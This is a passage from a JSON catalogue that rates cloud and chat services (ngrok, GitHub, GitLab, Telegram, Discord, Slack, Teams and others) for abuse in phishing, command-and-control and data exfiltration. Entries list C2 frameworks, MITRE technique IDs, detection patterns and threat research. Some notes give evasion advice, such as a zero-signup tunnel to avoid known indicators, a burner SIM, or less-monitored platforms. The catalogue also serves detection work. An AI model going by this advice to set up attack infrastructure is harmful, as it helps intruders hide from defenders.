      "d33wubrfki0l68.cloudfront.net",
      "_redirects file abuse (302 chains via netlify.app)",
      "CNAME dangling: Netlify 'Page not found' on unclaimed subdomain"
    ],
    "notes": "Quick static site hosting for phishing pages. Serverless functions for redirectors. Custom domains free. Deploy in <30 seconds from Git",
    "customDomain": true,
    "customDomainNotes": "Free custom domains with automatic HTTPS",
    "dataRetention": "Permanent (deployments immutable)",
    "rateLimits": "125k serverless function invocations/mo",
    "maxFileSize": "No per-file limit stated",
    "logging": "Analytics on Pro ($9/mo). Function logs available"
  },
  {
    "name": "Ngrok",
    "url": "https://ngrok.com",
    "category": "Cloud",
    "provider": "Ngrok",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "*.ngrok.io",
      "*.ngrok-free.app"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "high",
    "opsecNotes": "Ngrok domains are well-known IOCs. Blocked by mature orgs. Consider Cloudflare Tunnels as stealthier alternative",
    "socDetection": "likely",
    "banRisk": "medium",
    "banNotes": "Ngrok actively monitors for abuse. Free tier has interstitial warning page",
    "verification": "Email required. Phone for paid plans",
    "trust": "none",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "1 agent \u00b7 1 static domain \u00b7 20k req/mo \u00b7 ngrok-free.app domain"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API \u00b7 No SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1572",
      "T1090.004"
    ],
    "refs": [
      {
        "title": "Ngrok Pricing",
        "url": "https://ngrok.com/pricing"
      }
    ],
    "detection": [
      "*.ngrok.io",
      "*.ngrok.app",
      "*.ngrok-free.app",
      "*.ngrok.com",
      "tunnel.us.ngrok.com",
      "tunnel.eu.ngrok.com",
      "tunnel.ap.ngrok.com",
      "tcp.ngrok.io",
      "connect.ngrok-agent.com",
      "dns.ngrok-dns.com",
      "update.equinox.io",
      "Process: ngrok.exe or ngrok binary on endpoint",
      "User-Agent: ngrok/* in HTTP headers",
      "DNS queries to *.ngrok.io or *.ngrok-free.app",
      "MITRE ATT&CK S0508 (ngrok software entry)",
      "Splunk: Network Resolution for *.ngrok.com|*.ngrok.io",
      "96% of ngrok C2 is njRAT + Nanocore RAT (MalwarePatrol)"
    ],
    "notes": "Instant tunnel to expose local C2 listener. HIGH OPSEC RISK - ngrok domains are IOCs in most threat intel feeds. Use trycloudflare.com instead for zero-signup tunnels",
    "customDomain": false,
    "customDomainNotes": "Custom domains on paid plans only",
    "dataRetention": "Ephemeral tunnels",
    "rateLimits": "20k req/mo free. 40 connections/min",
    "maxFileSize": "No file hosting",
    "logging": "Request inspection dashboard. Detailed traffic replay"
  },
  {
    "name": "GitHub (Pages/Gists/Raw/Actions)",
    "url": "https://github.com",
    "category": "DevOps",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.github.io",
      "raw.githubusercontent.com",
      "gist.githubusercontent.com",
      "*.app.github.dev",
      "codeload.github.com",
      "objects.githubusercontent.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "api.github.com/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Raw content for payloads. Pages for phishing. API for C2. Actions for automated infra. Gists as dead drops",
    "socDetection": "moderate",
    "banRisk": "medium",
    "banNotes": "GitHub actively removes malicious repos/pages when reported. DMCA takedowns fast",
    "verification": "Email only. No phone. No CC for free. 2FA encouraged",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Unlimited repos \u00b7 Pages 100GB bw \u00b7 Gists unlimited \u00b7 Actions 2000 min/mo \u00b7 Codespaces 120 core-hrs/mo"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Enterprise Cloud \u00b7 SCIM on Enterprise \u00b7 OAuth Apps for API"
    },
    "knownC2": [
      {
        "name": "GithubC2",
        "url": "https://github.com/TheD1rkMtr/GithubC2"
      },
      {
        "name": "MythicC2-GitHub",
        "url": "https://github.com/MythicC2Profiles/github"
      },
      {
        "name": "gitC2",
        "url": "https://github.com/offalltn/gitC2"
      },
      {
        "name": "Redeemer-C2",
        "url": "https://github.com/Cherno-x/Redeemer-C2"
      },
      {
        "name": "disctopia-c2",
        "url": "https://github.com/3ct0s/disctopia-c2"
      }
    ],
    "exfilTools": [
      {
        "name": "GitHub Gist/API",
        "url": "https://lolexfil.github.io/#tool=GitHub%20Gist%20/%20GitHub%20API",
        "note": ""
      },
      {
        "name": "git push exfil",
        "url": "https://lolexfil.github.io/#tool=git%20%28exfil%20via%20remote%20push%29",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.001",
      "T1567.002",
      "T1071.001",
      "T1566.002",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "GitHub Pricing",
        "url": "https://github.com/pricing"
      },
      {
        "title": "GitHub SAML SSO",
        "url": "https://docs.github.com/en/enterprise-cloud@latest/authentication/authenticating-with-saml-single-sign-on"
      },
      {
        "title": "lolc2 - GitHub",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      },
      {
        "title": "Check Point: Payload Delivery via Bitbucket and GitHub in Multi-Stage Malware",
        "url": "https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/"
      },
      {
        "title": "Parrot CTFs: Red Team Infrastructure - GitHub for Payload Staging",
        "url": "https://parrot-ctfs.com/blog/red-team-infrastructure-complete-guide-to-setup-and-best-practices-in-2025/"
      }
    ],
    "detection": [
      "api.github.com/*",
      "raw.githubusercontent.com*",
      "gist.githubusercontent.com/*/*/raw/*",
      "codeload.github.com*",
      "*.app.github.dev/*"
    ],
    "notes": "5 lolc2 C2 frameworks. Pages for phishing, raw content for payloads, Gists for dead drops, Actions for CI/CD-based automation, Codespaces for full cloud dev environments. Universally trusted domain. GitHub used for payload staging in multi-stage malware (Check Point 2025). Skuld Stealer: open-source Go malware hosted on GitHub, targets credentials/cookies/crypto wallets. North Korean Contagious Interview campaign: 180+ fake personas, 50k+ downloads of malicious npm packages hosted via GitHub",
    "customDomain": true,
    "customDomainNotes": "GitHub Pages supports free custom domains with HTTPS",
    "dataRetention": "Permanent (repos, gists, releases)",
    "rateLimits": "5000 req/hr authenticated API. 60 unauthenticated. Actions 2000 min/mo",
    "maxFileSize": "100MB per file. 2GB release asset. 10GB repo soft limit",
    "logging": "Audit log on Enterprise. Security log on personal account",
    "lolc2Url": "https://lolc2.github.io/#github"
  },
  {
    "name": "GitLab (Pages/Snippets/CI)",
    "url": "https://gitlab.com",
    "category": "DevOps",
    "provider": "GitLab",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.gitlab.io",
      "gitlab.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "gitlab.com/api/v4/*"
    ],
    "opsec": "low",
    "opsecNotes": "Less monitored than GitHub. Snippets as dead drops. CI/CD pipelines for automation",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Less aggressive abuse enforcement than GitHub",
    "verification": "Email only. No CC for free tier",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "5GB storage \u00b7 Pages free \u00b7 CI/CD 400 min/mo \u00b7 5 users \u00b7 Container registry 5GB"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Premium+ \u00b7 Group-level SSO \u00b7 OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "git cli",
        "url": "https://git-scm.com",
        "note": "git push exfil via GitLab"
      }
    ],
    "mitre": [
      "T1102",
      "T1583.006",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "GitLab Pricing",
        "url": "https://about.gitlab.com/pricing/"
      },
      {
        "title": "GitLab SAML SSO",
        "url": "https://docs.gitlab.com/ee/user/group/saml_sso/"
      }
    ],
    "detection": [
      "*.gitlab.io",
      "*.gitlab.com",
      "gitlab.com/api/v4/*",
      "gitlab.com/api/v4/snippets/*",
      "gitlab.com/api/v4/projects/*/repository/files/*",
      "gitlab.com/api/v4/projects/*/jobs/artifacts/*",
      "registry.gitlab.com",
      "*.pages.dev.gitlab.io",
      "gitlab.com/-/snippets/*",
      "gitlab.com/*/raw/*"
    ],
    "notes": "Less SOC coverage than GitHub. Snippets for dead drops. CI/CD pipelines for automated payload delivery. Pages for phishing",
    "customDomain": true,
    "customDomainNotes": "GitLab Pages supports free custom domains",
    "dataRetention": "Permanent",
    "rateLimits": "API: 300 req/min authenticated",
    "maxFileSize": "5GB per project",
    "logging": "Audit events on Premium+"
  },
  {
    "name": "Bitbucket",
    "url": "https://bitbucket.org",
    "category": "DevOps",
    "provider": "Atlassian",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "bitbucket.io",
      "bitbucket.org"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Trusted Atlassian domain. Pipelines for automation",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Atlassian abuse team less active than GitHub",
    "verification": "Email only (Atlassian account)",
    "trust": "medium",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free up to 5 users \u00b7 1GB LFS \u00b7 Pipelines 50 min/mo"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM via Atlassian Access \u00b7 Atlassian Guard for org-level SSO"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "Bitbucket Downloads",
        "url": "https://lolexfil.github.io/#tool=Bitbucket%20Downloads%20%28staging%29",
        "note": ""
      }
    ],
    "mitre": [
      "T1583.006",
      "T1566.002",
      "T1567.002"
    ],
    "refs": [
      {
        "title": "Bitbucket Pricing",
        "url": "https://www.atlassian.com/software/bitbucket/pricing"
      },
      {
        "title": "Atlassian Access SSO",
        "url": "https://www.atlassian.com/software/access"
      },
      {
        "title": "Check Point: Skuld Stealer Payload Hosted on Bitbucket Downloads",
        "url": "https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/"
      }
    ],
    "detection": [
      "*.bitbucket.io",
      "*.bitbucket.org",
      "api.bitbucket.org/2.0/*",
      "api.bitbucket.org/2.0/repositories/*/downloads/*",
      "api.bitbucket.org/2.0/snippets/*",
      "bitbucket.org/*/downloads/*",
      "bitbucket.org/*/raw/*",
      "bitbucket.org/*/src/*",
      "Skuld Stealer payload hosting via bitbucket.org/*/downloads (Check Point 2025)"
    ],
    "notes": "Trusted Atlassian domain. Static site hosting via Bitbucket Cloud. Pipelines for CI/CD automation",
    "customDomain": false,
    "customDomainNotes": "No free custom domains",
    "dataRetention": "Permanent",
    "rateLimits": "API: 1000 req/hr",
    "maxFileSize": "2GB repo limit",
    "logging": "Audit log on Premium"
  },
  {
    "name": "Telegram",
    "url": "https://telegram.org",
    "category": "C2 Channel",
    "provider": "Telegram",
    "signup": "phone",
    "signupTime": "~2min",
    "domains": [
      "api.telegram.org"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.telegram.org/bot*"
    ],
    "opsec": "medium",
    "opsecNotes": "api.telegram.org is well-known C2 indicator in threat intel. Bot tokens extractable from malware samples. 10 known C2 frameworks",
    "socDetection": "likely",
    "banRisk": "medium",
    "banNotes": "Post-2024 Durov arrest: increased enforcement. Bot tokens can be revoked. IP/phone shared with LE on legal request. Phishing sites dropped sharply after Sept 2024",
    "verification": "Phone number required. No anonymous signup. Burner SIM needed for OPSEC",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Unlimited bots \u00b7 2GB file uploads \u00b7 No bot API rate limit \u00b7 Free forever"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": true,
      "notes": "Phone-based 2FA \u00b7 No SSO \u00b7 Bot tokens are auth mechanism"
    },
    "knownC2": [
      {
        "name": "disctopia-c2",
        "url": "https://github.com/3ct0s/disctopia-c2"
      },
      {
        "name": "telegram-c2agent",
        "url": "https://github.com/timebotdon/telegram-c2agent"
      },
      {
        "name": "DRat",
        "url": "https://github.com/SpenserCai/DRat"
      },
      {
        "name": "NativeTeleBackdoor",
        "url": "https://github.com/kensh1ro/NativeTeleBackdoor"
      },
      {
        "name": "teleBrat",
        "url": "https://github.com/Lemonada/teleBrat"
      },
      {
        "name": "Social-media-c2",
        "url": "https://github.com/woj-ciech/Social-media-c2"
      },
      {
        "name": "TelegramRAT",
        "url": "https://github.com/machine1337/TelegramRAT"
      },
      {
        "name": "Nightmangle",
        "url": "https://github.com/1N73LL1G3NC3x/Nightmangle"
      },
      {
        "name": "Poshito",
        "url": "https://github.com/itaymigdal/Poshito"
      },
      {
        "name": "c2-cloud",
        "url": "https://github.com/govindasamyarun/c2-cloud"
      }
    ],
    "exfilTools": [
      {
        "name": "Telegram Bot API",
        "url": "https://lolexfil.github.io/#tool=Telegram%20Bot%20API",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "Telegram Bot API",
        "url": "https://core.telegram.org/bots/api"
      },
      {
        "title": "lolc2 - Telegram",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "NVISO: Telegram Abuse for C2 & Exfiltration - Detection & Response Chronicles",
        "url": "https://blog.nviso.eu/2025/12/16/the-detection-response-chronicles-exploring-telegram-abuse/"
      },
      {
        "title": "Cofense: Weaponizing Telegram Bots - How Threat Actors Exfiltrate Credentials",
        "url": "https://cofense.com/blog/weaponizing-telegram-bots-how-threat-actors-exfiltrate-credentials"
      },
      {
        "title": "SOC Prime: Telegram Abuse in Malware - Real Campaigns and KQL Detections",
        "url": "https://socprime.com/active-threats/detection-response-chronicles-exploring-telegram-abuse/"
      },
      {
        "title": "Silobreaker: Mapping Threat Actor Abuse of Telegram - From C2 to Hacktivism",
        "url": "https://www.silobreaker.com/blog/cyber-threats/mapping-threat-actor-abuse-of-telegram-from-c2-to-hacktivism/"
      },
      {
        "title": "CYFIRMA: Raven Stealer Unmasked - Telegram-Based Data Exfiltration",
        "url": "https://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/"
      },
      {
        "title": "Picus: PupkinStealer .NET Infostealer Using Telegram for Data Theft",
        "url": "https://www.picussecurity.com/resource/blog/pupkinstealer-net-infostealer-using-telegram-for-data-theft"
      },
      {
        "title": "Upwind: How Adversaries Use Telegram to Evade Detection",
        "url": "https://www.upwind.io/feed/how-adversaries-use-telegram-to-evade-detection"
      }
    ],
    "detection": [
      "api.telegram.org/bot*"
    ],
    "notes": "10 lolc2 C2 frameworks. 3.8% of ALL malware campaigns use Telegram as C2 (Cofense Q1 2024-Q2 2025). Agent Tesla uses Telegram C2 in 77.7% of cases. Malware families: DeerStealer, Lumma Stealer, Raven Stealer, PupkinStealer, XWorm, NineRAT (Lazarus). Bot API: /sendMessage for text C2, /sendDocument for file exfil (up to 50MB). Post-Durov arrest (Aug 2024): platform now shares IP/phone with LE on legal request. Phishing sites using Telegram dropped sharply after arrest (Netcraft). Burner SIM needed for OPSEC. Bot tokens + chat IDs are hardcoded in malware and trivially extractable by defenders",
    "customDomain": false,
    "customDomainNotes": "N/A - messaging platform",
    "dataRetention": "Permanent (cloud-based)",
    "rateLimits": "Bot API: 30 msg/s. getUpdates: 100 msg/call",
    "maxFileSize": "2GB per file (Bot API)",
    "logging": "No admin audit logs. Telegram can see unencrypted chats",
    "lolc2Url": "https://lolc2.github.io/#telegram"
  },
  {
    "name": "Discord",
    "url": "https://discord.com",
    "category": "C2 Channel",
    "provider": "Discord",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "cdn.discordapp.com",
      "discord.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "discord.com/api/*",
      "discord.com/api/v9/channels/*",
      "discord.com/api/v9/guilds/*"
    ],
    "opsec": "medium",
    "opsecNotes": "CDN attachment URLs now scoped/expiring since 2023. Webhooks still work for fire-and-forget C2. 12 known frameworks",
    "socDetection": "likely",
    "banRisk": "high",
    "banNotes": "Active abuse detection. Webhooks flagged for malware distribution. CDN now scoped. Accounts banned for TOS violations",
    "verification": "Email required. Phone required for some servers. Captcha on signup",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Unlimited webhooks \u00b7 25MB file upload (50MB Nitro) \u00b7 50 servers \u00b7 Bot API free"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth2 for bot/app auth \u00b7 No enterprise SSO"
    },
    "knownC2": [
      {
        "name": "MythicC2-Discord",
        "url": "https://github.com/MythicC2Profiles/discord"
      },
      {
        "name": "disctopia-c2",
        "url": "https://github.com/3ct0s/disctopia-c2"
      },
      {
        "name": "DiscordGo",
        "url": "https://github.com/emmaunel/DiscordGo"
      },
      {
        "name": "DaaC2",
        "url": "https://github.com/crawl3r/DaaC2"
      },
      {
        "name": "Bifrost",
        "url": "https://github.com/th3r4ven/Bifrost"
      },
      {
        "name": "Willie-C2",
        "url": "https://github.com/kensh1ro/Willie-C2"
      },
      {
        "name": "discord-rat",
        "url": "https://github.com/codeuk/discord-rat"
      },
      {
        "name": "Cerberos-C2",
        "url": "https://github.com/Vczz0/Cerberos-C2"
      },
      {
        "name": "DCVC2",
        "url": "https://github.com/3NailsInfoSec/DCVC2"
      },
      {
        "name": "ZER0BOT",
        "url": "https://github.com/hoaan1995/ZER0BOT"
      },
      {
        "name": "Python-Trojan",
        "url": "https://github.com/Jeff53978/Python-Trojan"
      },
      {
        "name": "C3/Discord",
        "url": "https://github.com/WithSecureLabs/C3"
      }
    ],
    "exfilTools": [
      {
        "name": "Discord webhook",
        "url": "https://lolexfil.github.io/#tool=Discord%20webhook",
        "note": ""
      },
      {
        "name": "Webhook Exfil",
        "url": "https://lolexfil.github.io/#tool=Webhook%20Exfiltration%20%28Discord%20/%20Slack%20/%20Teams%29",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "Discord Developer Portal",
        "url": "https://discord.com/developers/docs/intro"
      },
      {
        "title": "lolc2 - Discord",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "CYFIRMA: Cyber Research on the Malicious Use of Discord (C2, webhooks, CDN)",
        "url": "https://www.cyfirma.com/outofband/cyber-research-on-the-malicious-use-of-discord/"
      },
      {
        "title": "Intel 471: How Discord is Abused for Cybercrime",
        "url": "https://www.intel471.com/blog/how-discord-is-abused-for-cybercrime"
      },
      {
        "title": "Check Point: Hijacked Discord Invites Used for Multi-Stage Malware Delivery",
        "url": "https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/"
      },
      {
        "title": "eSentire: ChaosBot - Rust-Based Malware Uses Discord for C2",
        "url": "https://thehackernews.com/2025/10/new-rust-based-malware-chaosbot-hijacks.html"
      },
      {
        "title": "Socket: Threat Actors Exploit Discord Webhooks for C2 via npm/PyPI/Ruby",
        "url": "https://gbhackers.com/threat-actors-exploit-discord-webhooks-for-c2/"
      }
    ],
    "detection": [
      "discord.com/api/*",
      "discord.com/api/v9/channels/*",
      "discord.com/api/v9/guilds/*"
    ],
    "notes": "12 lolc2 C2 frameworks. CDN links expire after 24h since 2023 - use webhooks instead. Webhooks: write-only, free, no auth needed - just URL possession. Supply chain attacks via webhooks in npm/PyPI/Ruby (Socket 2025). ChaosBot: Rust-based malware using Discord channels for C2 (eSentire 2025). Discord is 'commodity C2 as a service' - free infra, TLS to trusted domain, bypasses firewalls. Hijacked invite links for multi-stage malware delivery (Check Point 2025). Setting up Discord C2 is simpler than expected, even low-skilled TAs can do it (CYFIRMA)",
    "customDomain": false,
    "customDomainNotes": "N/A - messaging platform",
    "dataRetention": "Permanent (messages). CDN links expire after 24h since 2023. Webhook: write-only, no read-back",
    "rateLimits": "50 req/s global. Webhook: 30 msg/min/channel",
    "maxFileSize": "25MB file upload free. 500MB with Nitro",
    "logging": "Audit log for server admins. Message content accessible by Discord",
    "lolc2Url": "https://lolc2.github.io/#discord"
  },
  {
    "name": "Slack",
    "url": "https://slack.com",
    "category": "C2 Channel",
    "provider": "Salesforce",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.slack.com",
      "slack-files.com",
      "hooks.slack.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "slack.com/api/*",
      "hooks.slack.com/services/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Incoming webhooks are fire-and-forget. xoxb/xoxp tokens in malware are IOCs. 10 known C2 frameworks",
    "socDetection": "moderate",
    "banRisk": "medium",
    "banNotes": "Workspace abuse reports handled. Bot tokens revoked on report. Enterprise has audit logs",
    "verification": "Email only. No phone for free workspace. OAuth tokens are revocable",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free workspace \u00b7 90-day message history \u00b7 10 integrations \u00b7 5GB file storage"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Business+ ($12.50/u/mo) \u00b7 OAuth for bot/app tokens"
    },
    "knownC2": [
      {
        "name": "Slackor",
        "url": "https://github.com/Coalfire-Research/Slackor"
      },
      {
        "name": "SlackShell",
        "url": "https://github.com/bkup/SlackShell"
      },
      {
        "name": "slack-c2bot",
        "url": "https://github.com/praetorian-inc/slack-c2bot"
      },
      {
        "name": "c2s",
        "url": "https://github.com/j3ssie/c2s"
      },
      {
        "name": "slackhell",
        "url": "https://github.com/herwonowr/slackhell"
      },
      {
        "name": "slack-c2-golang",
        "url": "https://github.com/Yihsiwei/slack-c2-golang"
      },
      {
        "name": "MythicC2-Slack",
        "url": "https://github.com/MythicC2Profiles/slack"
      },
      {
        "name": "Shlack-C2",
        "url": "https://github.com/Cainor/Shlack-C2"
      },
      {
        "name": "C3/Slack",
        "url": "https://github.com/WithSecureLabs/C3"
      },
      {
        "name": "PeriscopeC2",
        "url": "https://github.com/mthcht/StringHunter-triage"
      }
    ],
    "exfilTools": [
      {
        "name": "Slack webhook",
        "url": "https://lolexfil.github.io/#tool=Slack%20webhook",
        "note": ""
      },
      {
        "name": "Webhook Exfil",
        "url": "https://lolexfil.github.io/#tool=Webhook%20Exfiltration%20%28Discord%20/%20Slack%20/%20Teams%29",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1071.001"
    ],
    "refs": [
      {
        "title": "Slack Pricing",
        "url": "https://slack.com/pricing"
      },
      {
        "title": "Slack SAML SSO",
        "url": "https://slack.com/help/articles/203772216-SAML-single-sign-on"
      },
      {
        "title": "Slack API",
        "url": "https://api.slack.com/"
      },
      {
        "title": "lolc2 - Slack",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "BlackBerry: Transparent Tribe Abuses Slack for C2 Against Indian Defense",
        "url": "https://thehackernews.com/search/label/Discord"
      },
      {
        "title": "Parrot CTFs: Red Team Infrastructure - Slack Channel for C2 Communication",
        "url": "https://parrot-ctfs.com/blog/red-team-infrastructure-complete-guide-to-setup-and-best-practices-in-2025/"
      }
    ],
    "detection": [
      "slack.com/api/chat.postMessage",
      "slack.com/api/conversations.*",
      "slack.com/api/files.upload*"
    ],
    "notes": "10 lolc2 C2 frameworks including Mythic profile and C3 channel. Webhooks for C2. File uploads for exfil. Workspace invites for social engineering. Token types: xoxb (bot), xoxp (user), xoxs (session). Transparent Tribe (Pakistan APT) abuses Slack for C2 against Indian defense/aerospace sector (BlackBerry 2024). Beacon checks Slack channel for commands, posts results back - appears as legitimate business communication",
    "customDomain": false,
    "customDomainNotes": "N/A - messaging platform",
    "dataRetention": "Free: 90 days message retention (since 2022)",
    "rateLimits": "Webhook: 1 msg/s. API: tier-based (20-100 req/min)",
    "maxFileSize": "1GB file storage free workspace total",
    "logging": "Audit logs on Enterprise Grid. Analytics on Pro",
    "lolc2Url": "https://lolc2.github.io/#slack"
  },
  {
    "name": "Microsoft Teams",
    "url": "https://teams.microsoft.com",
    "category": "C2 Channel",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "teams.microsoft.com",
      "graph.microsoft.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 1
    },
    "apiEndpoints": [
      "graph.microsoft.com/v1.0/teams/*",
      "graph.microsoft.com/v1.0/chats/*",
      "teams.microsoft.com/api/chatsvc/*"
    ],
    "opsec": "low",
    "opsecNotes": "External messaging for phishing. Device code phishing via Teams. Graph API for automation. 2 known C2 frameworks",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Part of M365 - abuse handled through Microsoft reporting. Less scrutinized than consumer platforms",
    "verification": "Microsoft account required. M365 license for full features",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 100 participants \u00b7 60min meetings \u00b7 M365 trial for full features \u00b7 Graph API with delegated auth"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "M365/Entra SAML/OIDC federation \u00b7 Graph API with delegated/app OAuth \u00b7 SCIM via Entra"
    },
    "knownC2": [
      {
        "name": "convoC2",
        "url": "https://github.com/cxnturi0n/convoC2"
      },
      {
        "name": "pac2",
        "url": "https://github.com/NTT-Security-Japan/pac2"
      }
    ],
    "exfilTools": [
      {
        "name": "Webhook Exfil",
        "url": "https://lolexfil.github.io/#tool=Webhook%20Exfiltration%20%28Discord%20/%20Slack%20/%20Teams%29",
        "note": ""
      }
    ],
    "mitre": [
      "T1102",
      "T1566.002",
      "T1528",
      "T1550.001"
    ],
    "refs": [
      {
        "title": "Teams Free",
        "url": "https://www.microsoft.com/en-us/microsoft-teams/free"
      },
      {
        "title": "Graph API Teams",
        "url": "https://learn.microsoft.com/en-us/graph/api/resources/teams-api-overview"
      },
      {
        "title": "lolc2 - Teams",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "teams.microsoft.com/api/chatsvc/*/v1/threads",
      "teams.microsoft.com/api/chatsvc/*/v1/users/ME/conversations/"
    ],
    "notes": "2 lolc2 C2 frameworks (convoC2, pac2). External messaging for phishing. Device code phishing is highly effective. Graph API webhooks for C2. Post-compromise exfil with GraphRunner/TeamFiltration",
    "customDomain": false,
    "customDomainNotes": "N/A - messaging platform",
    "dataRetention": "Retention per org policy (default: permanent)",
    "rateLimits": "Connector webhook: 4 msg/s",
    "maxFileSize": "250MB per file",
    "logging": "M365 Audit Log, Compliance Center, eDiscovery",
    "lolc2Url": "https://lolc2.github.io/#microsoft-teams"
  },
  {
    "name": "Twitter / X",
    "url": "https://x.com",
    "category": "C2 Channel",
    "provider": "X Corp",
    "signup": "email+phone",
    "signupTime": "~3min",
    "domains": [
      "*.twitter.com",
      "t.co",
      "api.twitter.com",
      "api.x.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.x.com/2/*",
      "api.twitter.com/1*",
      "api.twitter.com/2*"
    ],
    "opsec": "medium",
    "opsecNotes": "API now paid. t.co shortlinks for phishing. DMs/tweets/bios for C2 data. XC2 is official lolc2 project",
    "socDetection": "moderate",
    "banRisk": "medium",
    "banNotes": "API abuse detection active. Accounts suspended for automation. API now paid",
    "verification": "Email + phone required. API requires developer portal approval",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "API free: 1500 tweets/mo read \u00b7 Limited write \u00b7 Developer portal free \u00b7 Basic tier $100/mo"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
